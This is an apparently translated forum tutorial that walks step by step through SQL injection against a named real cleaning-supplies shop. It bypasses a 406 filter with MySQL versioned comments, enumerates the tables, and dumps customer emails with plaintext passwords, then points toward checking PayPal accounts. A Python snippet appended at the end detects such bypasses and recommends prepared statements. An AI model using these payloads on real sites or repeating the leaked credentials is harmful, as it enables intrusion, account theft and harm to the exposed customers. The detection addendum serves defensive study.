Euro 2012 kicks off today, so I'm taking the liberty of writing a tutorial for newbies on SQL injection against a site that answers with a 406 error. If you already know this, please don't throw bricks at me.

Site:


Code:
http://www.jansancleaningsupplies.com/index.php?pid=47'
+ Order by:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 1
--> No error.
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 2
--> Error.
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION SELECT 1-- -
-->
Not Acceptable

An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
+ Bypass:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1-- -
-> 1
+Get table:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1 group_concat(table_name) from information_schema.tables where table_name=database()-- -
-->
Not Acceptable

An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
+ Continue bypassing:
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!table_name*/))) from information_schema./*!tables*/ where table_schema=database()-- -
-->
articles,auth,categories,customers,manufacturers,orders,products,specialfiles
+ Get columns: customers
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!column_name*/))) from information_schema./*!columns*/ where table_schema=database() and /*!table_name*/=0x637573746f6d657273-- -
-->
id,email,password,passhash,joindate,firstname,mi,lastname,companyname,street1,
street2,city,state,zipcode,priphone,secphone,getemail,billme,shipping,orders

+Get id,email,password:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!id,0x7c,email,0x7c,password*/))) from customers-- -
-->
4|dpdurrell@hotmail.com|preston59

3|josh@uppertech.net|eeq7322
----> Check PP .
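
A defender's view of the bypass above, as an added example that is not part of the original post: MySQL executes the contents of `/*! ... */` comments as SQL, so a filter that matches keywords on the raw request misses them. The sketch below unwraps such comments before matching; the rule names, function names and sample query strings are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# MySQL runs the body of /*! ... */ (optionally /*!50000 ... */) as SQL,
# so the body must be kept and inspected, not discarded as a comment.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Hypothetical, deliberately small rule set covering the steps on this page.
RULES = {
    "order-by-probe": re.compile(r"\border\s+by\s+\d+\b"),
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema-enum": re.compile(r"\binformation_schema\s*\.\s*(tables|columns)\b"),
}

def normalize(raw_query):
    """URL-decode, unwrap versioned comments, drop plain ones, fold case."""
    text = unquote_plus(raw_query)
    text = VERSIONED.sub(r" \1 ", text)      # keep the executable body
    text = PLAIN_COMMENT.sub(" ", text)      # plain comments act as whitespace
    return re.sub(r"\s+", " ", text).lower().strip()

def _hits(text):
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def naive_match(raw_query):
    """Keyword matching on the decoded request only (what gets bypassed)."""
    return _hits(unquote_plus(raw_query).lower())

def match_rules(raw_query):
    """Keyword matching after comment normalization."""
    return _hits(normalize(raw_query))

# Constructed query strings, shaped like access-log entries for index.php.
SAMPLES = [
    "pid=47",
    "pid=47%20order%20by%202",
    "pid=-47%20UNION%20/*!SELECT*/%201--%20-",
    "pid=-47+UNION+/*!SELECT*/+unhex(hex(group_concat(/*!table_name*/)))"
    "+from+information_schema./*!tables*/+where+table_schema=database()--+-",
]

if __name__ == "__main__":
    for q in SAMPLES:
        print(f"naive={naive_match(q)} normalized={match_rules(q)} :: {q[:50]}")
```

Filtering of this kind is a detection aid only; the injection itself goes away when `pid` is bound as an integer parameter in a prepared statement.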
